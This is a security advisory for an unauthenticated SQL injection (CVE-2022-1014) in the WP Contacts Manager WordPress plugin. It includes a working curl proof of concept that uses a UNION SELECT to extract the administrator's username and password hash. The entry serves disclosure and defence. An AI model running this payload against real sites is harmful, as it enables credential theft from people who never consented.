WP Contacts Manager <= 2.2.4 – Unauthenticated SQLi | CVE 2022-1014 | Plugin Vulnerabilities

Description

The plugin fails to properly sanitize user supplied POST data before it is being interpolated in an SQL statement and then executed, leading to an SQL injection vulnerability.

Proof of Concept

curl 'http://127.0.0.1:8080/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact' \
    --data '{"id":"1\u0027 UNION ALL SELECT 1,(SELECT user_login FROM wp_users WHERE ID = 1),(SELECT user_pass FROM wp_users WHERE ID = 1),4,5,6,7,8,9,0,1,2; -- "}'

Affects Plugins

wp-contacts-manager

No known fix

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

eb9e202d-04aa-4343-86a2-4aa2edaa7f6b

Timeline

Publicly Published

2022-05-02 (about 2 years ago)

Added

2022-05-02 (about 2 years ago)

Last Updated

2022-05-02 (about 2 years ago)

Other

Published

Title

Published

2017-09-19

Title

WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection

Published

2021-09-03

Title

Support Board < 3.3.4 - Multiple Unauthenticated SQL Injections

Published

2023-12-21

Title

Clockwork SMS Notfications <= 3.0.4 - Authenticated(Administrator+) SQL Injection

Published

2023-05-10

Title

WP Replicate Post < 4.1 - Contributor+ SQL Injection

Published

2023-10-30

Title

Wp anything slider < 9.2 - Authenticated (Subscriber+) SQL Injection via Shortcode